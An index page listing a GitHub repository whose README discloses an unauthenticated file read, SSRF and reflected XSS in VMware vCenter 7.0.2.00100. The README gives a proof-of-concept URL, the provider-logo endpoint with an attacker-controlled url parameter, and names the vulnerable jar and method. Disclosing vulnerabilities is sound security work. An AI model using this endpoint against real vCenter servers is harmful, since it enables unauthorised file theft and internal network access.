Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/l0ggg/VMware_vCenter
VMware vCenter 7.0.2.00100 unauth Arbitrary File Read + SSRF + Reflected XSS
Last synced: 21 days ago
- Host: GitHub
- URL: https://github.com/l0ggg/VMware_vCenter
- Owner: l0ggg
- Created: 2021-12-01T05:13:12.000Z (about 3 years ago)
- Default Branch: main
- Last Pushed: 2021-12-01T08:02:39.000Z (about 3 years ago)
- Last Synced: 2024-02-11T21:18:14.056Z (10 months ago)
- Homepage:
- Size: 347 KB
- Stars: 219
- Watchers: 6
- Forks: 32
- Open Issues: 1
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - l0ggg/VMware_vCenter - VMware vCenter 7.0.2.00100 unauth Arbitrary File Read + SSRF + Reflected XSS (Others)
README
# VMware vCenter 7.0.2.00100 and earlier versions have an unauthenticated arbitrary file read + SSRF + XSS vulnerability
## POC
https://{vCenterserver}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url={url}
File read:
![](./file_read.PNG)
SSRF + XSS:
![](./xss.PNG)
## Vulnerable code
Jar: /etc/vmware/vsphere-ui/cm-service-packages/com.vmware.cis.vsphereclient.plugin/com.vmware.h4.vsphere.client-0.4.1.0/plugins/h5-vcav-bootstrap-service.jar
Method: com.vmware.h4.vsphere.ui.bootstrap.controller.ProvidersController.getProviderLogo()
![](./code.PNG)
Tested on vCenter 7.0.2.00100; the exact affected version range and CVE ID are not known.